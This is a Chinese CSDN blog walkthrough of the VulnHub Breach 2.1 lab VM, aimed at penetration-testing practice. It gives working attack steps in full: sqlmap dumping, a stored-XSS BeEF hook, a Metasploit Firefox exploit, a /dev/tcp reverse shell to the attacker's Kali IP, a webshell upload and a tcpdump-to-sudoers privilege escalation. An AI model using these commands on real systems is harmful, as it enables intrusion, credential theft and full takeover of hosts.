Breach: 2.1 靶机 - 详细流程

已于 2024-10-07 17:09:00 修改
阅读量494 收藏 7
点赞数 20
文章标签: 网络安全 web安全 安全 网络
于 2024-10-07 16:55:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73983897/article/details/142740478
版权

  • ✨ 准备工作

  1. 靶机 && kali 环境要求

    机器名网络配置
    靶机Breach-2_final2.1仅主机模式
    攻击机kali仅主机模式

  2. 靶机下载链接:Breach: 2.1 ~ VulnHub

  3. 打开 VMware,将 Breach-2_final2.1.ova 拖拽到 VMware

  4. 设置 虚拟机名称(A) - 存储路径(P)- 导入   

  5. 若是,提示出错,点击重试即可

  6. 启动虚拟机,等待安装完成

  7. 启动成功

  8. 右击靶机 - 设置  

  9. 点击 网络适配器 将其设为 仅主机模式 ,并点击  高级,查看MAC地址

  10. MAC 地址为:00:0C:29:43:58:18

  11. 又因为其在描述中说明:靶机的静态IP为:192.168.110.151  

  12. 所以我们将 仅主机模式的网卡 设置 192.168.110.0/24  段的

  13. 点击 编辑 - 虚拟网络编辑器

  14. 选中 仅主机的网卡 - 点击 更改设置(C)  (这里可以记录一下现在仅主机的网段,方便后面还原)

  15. 确认后,打开如下页面,选中 仅主机的网卡 ,将子网IP(I)更改为 192.168.110.0  - 确定  

  16. 重启靶机

  17. kali就比较简单了,直接将其设为 仅主机模式 就可以了

  • ☄️ 信息收集

  1. 既然我们已经知道靶机的IP是 192.168.110.151 了 ,那就不用扫描主机了

  2. 直接进行端口扫描:

    nmap -sV -p- 192.168.110.151

  3. 发现其开放了 111,51356,65535 端口

  4. 经测试后发现在  ssh  服务中,给出了提示信息(账号,密码)

    ssh 192.168.110.151 -p 65535

    # 账号:
Peter

# 密码:
inthesource

  5. 使用获得的账号密码进行登录

    ssh peter@192.168.110.151 -p 65535

# 密码:
inthesource

  6. 发现登录成功后,又被断开了,看来是不想让我们轻易拿到 shell

  7. 暂时险入瓶颈,想着通过网页再看看剩余端口有没有变化时,输入靶机IP,居然有了一个页面

  8. 再用 nmap 扫一下,发现开放了一个80端口

    nmap -sV -p- 192.168.110.151

  9. 虽然有点怪,但不影响,我们继续;

  • 🌠 获取shell

  1. 查看网站首页源码,并没有发现有用信息,转头进行目录扫描(这里我使用了 dirsearch

    dirsearch -u http://192.168.110.151

  2. 发现如下页面:192.168.110.151/blog/   

  3. 对搜索框进行测试,发现其存在SQL注入

    # 1' and 1=1 #
http://192.168.110.151/blog/index.php?search=1%27+or+1%3D1%23

# 1' or 1=2 #
http://192.168.110.151/blog/index.php?search=1%27+or+1%3D2++%23

  4. 先确认一下有哪些库

    sqlmap -u "http://192.168.110.151/blog/index.php?search=1" --dbs --batch

  5. 发现2个特别的库,分别通过 Sqlmap 下载后发现,重要的数据在 oscommerce 中

    sqlmap -u "http://192.168.110.151/blog/index.php?search=1" -D oscommerce --dump --batch

  6. oscommerce 下的 osc_administrators.csv  中 发现了 用户账号和密码

    # 账号
admin

# 密码(加密)
685cef95aa31989f2edae5e055ffd2c9:32

  7. 进行破解,得到

    # 密码
32admin

  8. 破解网站:MD5免费在线解密破解_MD5在线加密-SOMD5

  9. 结果尝试,虽然得到一个管理员的账户密码,但我们不知道是哪个服务的;先放一放,后面肯定会用到的;

  10. 回到 192.168.110.151/blog/  ,根据日常挖洞的经验,存在SQL注入的功能点是极大概率存在XSS漏洞

  11. 对搜索框进行 XSS 测试

    <h1>11<h1>

  12. 发现确实存在 XSS 漏洞,不过是反射型的,因为我们无法令他主动点击我们的恶意链接,所以我们必须找个存储型的 XSS 漏洞

  13. 在首页刚好有个注册用的功能点,进行测试

  14. 输入UsernamePassword 和 E-Mail ,点击 注册

    <script>console.log(1)</script>
<script>console.log(2)</script>
<script>console.log(3)</script>

  15. 按下 F12,点击 控制台 ,寻找回显点,并且确认是哪个字段进行了回显(UsernamePassword 和 E-Mail

  16. 看起来是 Username 会进行回显,那重点注入 Username 即可

  17. 接下来 kali 使用 beef - xssgetshell,更改 kali 的网络模式(仅主机即可)

  18. ,执行安装 beef -xss 的命令

    # 安装 beef-xss
beef-xss
# 安装提示(y/n),都选 y

# 若是中途报错,则需要更新软件包列表后继续执行上面的命令
sudo apt-get update

  19. 安装完成后,再将 kali 的网络模式更改为 仅主机模式

  20. 以管理员用户启动 beef-xss  (非管理员无法启动),设置密码,启动成功

  21. ifconfig 查看 kali 的 IP,因为是静态IP找到 192.168.110.0/24 网段的

  22. 替换 <IP>kali 的 IP

    <script src="http://<IP>:3000/hook.js"></script>

# 例:
<script src="http://192.168.110.128:3000/hook.js"></script>

  23. 回到注册页面 http://192.168.110.151/blog/register.html   ,在 Username 处填入 修改后的恶意链接,点击 RegisterMenmbers

  24. 回到 kali 访问 http://127.0.0.1:3000/ui/authentication   , 进行登录(账号默认 beef

    # 登录页面
http://127.0.0.1:3000/ui/authentication

# Username:
beef

# Password:
你设置的密码

  25. 登录成功,发现靶机已经上线了

  26. 点击查看,发现浏览器是 Firefox/15.0版本(这里和后面执行都必须是Online的)

  27. 打开 msf ,进行利用

    # 确定 msf
msfconsole
  
# 搜索 EXP
search firefox 15
  
# 使用 exploit/multi/browser/firefox_proto_crmfrequest
use 12
  
# 查看需要设置的内容
show options
  
# 设置 IP 为 kali的IP
set LHOST 192.168.110.128

# 设置端口(也可以默认4444)
set LPORT 555
  
# 运行
run

  28. 生成恶意链接,并复制下来

  29. 切换回网页,点击 靶机IP字段 - Commands - Misc - Create Invisible iframe - 写入上面生成的链接 - Execute  

  30. 成功反弹到 shell (这里要等 箭头指的语句出现后再执行 )

  31. 执行以下命令,反弹shell

  32. PS:这里sessions -i ID 概率连不上而且会结束会话,到时候再点一下网页中的 Execute 即可

  33. 若是试了很多次还是连不上,可以换个端口,无需使用 use post/multi/manage/shell_to_meterpreter 这类操作,因为我已经试过了,连不上的依旧连不上;

    # 新开一个终端进行监听 
sudo nc -lvnp 666


# 另一个终端(MSF)
# 按下回车键

# 查看会话ID
sessions

# 调用对应的会话
sessions -i 2

# 执行反弹shell的命令
/bin/bash -c '生成的语句'

# 例:
/bin/bash -c '/bin/sh -i >& /dev/tcp/192.168.110.128/666 0>&1'

  34. 这里进行做些工作,让 ssh 服务能够远程连接,方便我们的下次使用

  35. 查看 ssh 的配置文件 sshd_config 文件,发现一个名字比较特殊的文件 startme

    cat /etc/ssh/sshd_config

  36. 查看文件内容和权限,发现是启动 Apache 服务的,且 root 用户才能修改

    ls -l /usr/bin/startme

  37. 从其他方面下手,查看当前目录,发现了 .bashrc 文件(用户登录成功后加载的文件,但不是必须的)

  38. 写入 shell ,将 .bashrc 原有内容覆盖 ,发现可以通过 SSH 登录了

    # 使用 shell 覆盖原有内容
echo 'exec /bin/bash' > .bashrc

# ssh 登录
ssh peter@192.168.110.151 -p 65535

# 密码
inthesource

# 输入密码后需等一会儿后,按下 Ctrl+C 才能获得 shell
Ctrl+C

  • 💫 权限提升

  1. 查看可登录的用户,发现3个可登录的用户(root,peter,milton

    grep '/bin/bash$' /etc/passwd

  2. 查看端口开放情况,在监听的端口中,发现了2个新开放的端口(2323,38612)

    netstat -anlpt

  3. 经过测试,发现 2323 端口,可以使用 telnet 连接,并且通过坐标 (29 45'46" N 95 22'59" W ) 向我们提示了密码

    telnet 127.0.0.1 2323

  4. 查询坐标 世界地图纬度经度-在线 (aspose.app)  ,

    # 纬度
29.4546

# 经度
-95.383056

  5. 继续使用 telnet 登录,发现我们还要回答他的问题 Whose stapler is it?

    telnet 127.0.0.1 2323

# 用户名
milton

# 地区(密码)
Houston

  6. 查看后发现是  /usr/local/bin/cd.py 打印的

    grep -r "Whose stapler is it?" / 2>/dev/null

  7. 查看该文件,发现 staplermine

    cat /usr/local/bin/cd.py

  8. 回到 telnet 登录界面,输入 mine ,得到一个新用户 milton

    mine

  9. 继续查看端口,发现又开放了 8888端口

    netstat -anlpt

  10. 测试后发现是 http 服务,直接访问  Index of / ,发现如下界面  

  11. 进行目录扫描,发现后台登陆点  Flair Store: osCommerce Administration Tool: Login    和目录遍历漏洞(这里包含了文件上传后的地址)

    dirsearch -u "http://192.168.110.151:8888/oscommerce/"

  12. 使用前面获取到的账号 / 密码(去除32)登录成功

    # 账号
admin

# 密码
admin

  13. 并经过寻找,发现了文件上传的功能点 Flair Store: osCommerce Administration Tool: File ManagerTools - File Manager - includes - work - upload

  14. PS:为什么不选择其他上传点,因为在点击过程中发现的其他上传点,并没有上传的功能,点击了也只是会报错而已;

  15. 上传恶意文件

  16. 并通过刚才的目录遍历漏洞找到了上传的位置  Index of /oscommerce/includes/work/    ,点击后发现可以解析;

  17. 使用蚁剑连接,成功

  18. 查看权限后发现是又一个普通用户

  19. 进行反弹 shell 获得 交互式shell (因为前面生成过了,并且之前的 shell 我也不用了,这里就直接拿来用了)

    # kali 监听语句
sudo nc -lvnp 666

# 执行反弹shell的命令
/bin/bash -c '生成的语句'

# 例:
/bin/bash -c '/bin/sh -i >& /dev/tcp/192.168.110.128/666 0>&1'

  20. 列出当前用户拥有sudo权限的命令

    sudo -l

  21. 发现拥有sudo权限的是 tcpdump ,使用 Linux的辅助提权网站,辅助我们提权 GTFOBins   ,输入tcpdump

  22. 提示提权命令,更改后提权

    # 命令
COMMAND='id'
echo  "blumbergh ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers


# 临时文件(推荐.sh脚本文件)
TF=$(mktemp)
/tmp/com.sh

# 写命令到临时文件中
echo "$COMMAND" > $TF
echo 'echo  "blumbergh ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /tmp/com.sh

# 添加执行权限
chmod +x $TF
chmod +x /tmp/com.sh

# 提权
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/com.sh -Z root

  23. 输入命令后等待(大概1分钟左右) 或 自动产生流量即可(在反弹的shell终端内执行 telnet 127.0.0.1 2323

    echo 'echo  "blumbergh ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /tmp/com.sh

chmod +x /tmp/com.sh

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/com.sh -Z root

# 提升权限
sudo su root

  24. 提权成功

  25. 附Falg位置: /root/.flag.py

    python /root/.flag.py

  • 🌃 环境恢复 - Vmware 仅主机网段

  1. 目的:恢复修改过的网段,防止一些莫名其妙的问题

  2. 首先将正在使用的所有 虚拟机 挂起关闭

  3. 点击 编辑 - 虚拟网络编辑器

  4. 选中 仅主机 - 更改设置(C)

  5. 选中 仅主机 - 更改回原来的网段 - 确定 ,

  6. 恢复完毕

  • 🌌 总结

  1. 流程:主机发现 - 信息收集 - Web渗透 -  获取shell - 权限提升
  2. 信息收集
    1. 端口扫描立大功,归功于靶机的脑洞比较大,访问特定服务后才会开启另一个服务,在今后的测试中也需要分阶段性地进行端口扫描;
  3. Web渗透
    1. 一般存在 SQL注入 的功能点大多都存在 XSS漏洞,而且XSS漏洞既然存在就一定不止一个;
    2. XSS漏洞(存储型)+ 浏览器漏洞 获取shell,在靶机中比较少见,但也需要注意;
    3. MSF 中要注意区分使用 sessionsessions 的命令,有时候多打一个s就浪费一上午时间;
    4. sshd_config 文件由于某些原因无法使用时,修改 .bashrc 文件也是一种常见的思路;
  4. PS:比较简单,但需要脑洞大开的一个靶机

冰水°
关注
VulnHub靶场笔记 - Breach: 2.1(OSCP推荐靶场)
m0_62652276的博客
12-31 1318
根据此前的提示,我们尝试使用beef-xss工具(密码igfix),我们将红框中的数据作为用户名在blog中注册一个用户,把127.0.0.1替换为Kali的地址。sshd_config是客户端的ssh配置文件,查看内容,在配置文件末尾发现,ssh连接过程会强制执行名为startme的程序,推测其与ssh无法成功连接有关。综合之前的思路,既然peter用户的密码是知道的但无法正常进行ssh登录,我们尝试查找与ssh相关的配置。
Breach 2.1靶机
m0_61995767的博客
08-02 2103
Breach 2.1打靶记录
(VulnHub靶机通关)breach系列:breach-2.1细节通关方法
yang1234567898的博客
01-26 3656
靶机下载地址:https://download.vulnhub.com/breach/Breach-2_final2.1.zip 需要配置仅主机模式
Breach-2.1靶机
m0_65285254的博客
08-02 449
sshd_config是客户端的ssh配置文件,在文件末尾发现,ssh连接过程会强制执行名为startme的程序,推测其与ssh无法成功连接有关。提交成功之后访问http://192.168.110.151/blog/members.html 即可触发漏洞。在配置文件中发现,mysql数据库的root用户并没有设置密码,所以我们可以直接登录数据库后台。开放端口三个,分别是111,40653,65535三个端口 没有80端口。查看/home/milton目录下的文件 发现 .profile 文件。
VulnHub靶场笔记 - Breach: 2.1
2401_83378606的博客
09-22 1141
这里我们用dirsearch(kali的话需要自己安装直接输入dirsearch然后根据提示输入Y即可要注意的是因为kali设置的是仅主机模式没有网络所以可以先切换到桥接模式或者NAT模式再安装即可)顺便说一下因为提前了解过后面的操作加上之前测试的xss,推出这是存在存储型xss的,因为可能会影响后续的操作,这里不建议尝试,如果尝试了可以恢复快照。点击go成功弹窗看来存在xss,似乎是一个利用点,再看看其他的功能点。惊奇的发现多了个80端口,不知道这是什么回路,晕,尝试访问一下。
Breach: 2.1
weixin_53626662的博客
08-01 157
2.使用beef-xss工具,木有的下载一下(直接输入回车,就会出来提示,输入 y 回车即可,下载时间可能会有点长)in the source或者inthesource,也有可能是blog或者vacation密码。6.使用peter:inthesource进行ssh连接,还是显示登录失败。1.到首页注册xss用户(主要是用户名,其他两个随便)如果下载报错,就尝试输入apt-get update。8.访问80端口,这里使用翻译软件翻译了一下。再进行TCP扫描,出现80端口。3.更新user.list。
Breach-2.1
weixin_44770698的博客
03-10 774
靶场练习-60
(vulnhub靶机通关)Breach系列:breach-1.0
yang1234567898的博客
01-22 4372
靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 环境配置 根据作者描述,靶机配置了一个静态IP地址(192.168.110.140),需要仅主机适配器配置此子网 配置仅主机网卡为DHCP,子网地址192.168.110.0 注意:类型为仅主机的网卡才可以 VMware适配器改成以下地址 靶机和kali网络选仅主机模式 确实环境是否配置好 环境搞好,直接开干! 信息收集 扫端口 扫描.
vulnhub-Breach 2.1靶机
wjSteve的博客
09-18 732
网站存在一个搜索框,看到这个一般就会考虑XSS或者搜索型SQL注入,尝试发现确实存在SQL注入(输入单引号会导致不输出结果条数,正常至少输出一个0)输入密码之后直接关闭连接,和之前做的一个靶机非常像,但是没有弹出错误提示说明密码正确,尝试指定/bin/bash也不起作用,再次收集端口信息。弹出了一段信息,比较有用的是第四行,给出了peter账户,并且有一个灯下黑的密码"inthesource"给出了一个坐标,经查询是Houston(休士顿,我们遇到麻烦了),估计是个密码(毕竟这里已经显示让登录了)
一起打靶-Breach-2-final2.1.xss上线
09-28
"一起打靶-Breach-2-final2.1.xss上线" 知识点1:靶机配置 靶机 Breach 2.0 配置了静态 IP(192.168.110.151),用户需要配置主机 only 适配器来访问该子网。 知识点2:生产环境模拟 该挑战试图展示一个真实世界的...
breach靶机
Encild的博客
11-09 435
[2021 11 7] breach靶机端口扫描GetShell 目录 breach靶机 端口扫描 GetShell breach靶机 端口扫描 已知IP为192.168.110.140 直接扫描端口: sudo nmap -sF -p1-65535 192.168.110.140 访问80端口: 翻译: Initech 遭到破坏,董事会投票决定引入其内部的 Initech Cyber•• Consulting LLP 部门...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8490
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全 网络安全的主要领域 安全威胁 防护技术 安全策略 未来趋势
最新发布
weixin_42462436的博客
10-03 1412
随着智能手机和平板电脑的广泛使用,移动设备的安全(如数据加密、设备丢失保护等)也成为重点。由国家级或高级黑客组织发起的持续性、高度隐蔽的网络攻击,通常以窃取敏感信息为目的。使用加密、访问控制、数据备份等手段来保护信息免受未经授权的访问、修改或删除。包括防火墙、入侵检测系统(IDS)、入侵防御系统(IPS)等技术的使用。保证操作系统和相关服务的安全,包括权限控制、补丁管理、系统日志监控等。利用全球收集的安全信息和分析工具,提前识别并防御潜在的威胁。关注对虚拟化平台、API安全、数据隔离和访问管理的控制。
个人网络安全的几个重点与防御
nn_84的博客
10-03 366
2 防火墙 大家都用windows 只需在 gpedit.msc 设置 但有什么未知漏洞就不得而知了 因为美国的计划问题。1 浏览器 firefox 这是第一选择 如果你真的不明白可以找找各个浏览器漏洞。3 移动设备带来的危害 比如u盘 等 对于你们认为杀毒可以 那免杀还干吗呢。网络端口溢出漏洞 但防火墙和随机地址的原因 已经可以防御。提权 这是以后遇到的问题 有些漏洞不是随机地址能够阻止。mail 的危险的 来自与代理和漏洞。浏览器溢出漏洞 实时注意更新就可以。
工业控制过等保三级需要的网络安全设备及详细讲解
weixin_59571541的博客
09-30 826
在工业控制系统(ICS)的安全性日益受到重视的背景下,网络安全等级保护(过等保)三级作为一种重要的安全标准,对保障工业控制系统的安全运行有着重要的意义。过等保三级主要针对那些对安全性要求较高的系统,如电力、石油、化工等关键基础设施,以下是实现过等保三级所需的主要网络安全设备及其详细讲解。
网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 285
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
Web安全 - 文件上传漏洞(File Upload Vulnerability)
小工匠
10-02 1744
文件上传漏洞是指Web应用允许用户上传文件,但没有对上传文件进行充分的验证和限制,导致攻击者可以上传恶意文件,如脚本、恶意代码等,进一步执行恶意操作。这种漏洞常见于文件管理、头像上传或文档管理等功能中。路径穿越结合文件上传:绕过文件上传目录限制,访问或执行敏感位置的文件。远程代码执行(RCE)结合文件上传:通过上传并执行恶意文件实现远程控制。跨站脚本(XSS)结合文件上传:通过文件传播恶意脚本,跨站点执行攻击。跨站请求伪造(CSRF)结合文件上传:在不知情的情况下诱使用户上传恶意文件。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-29 1125
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值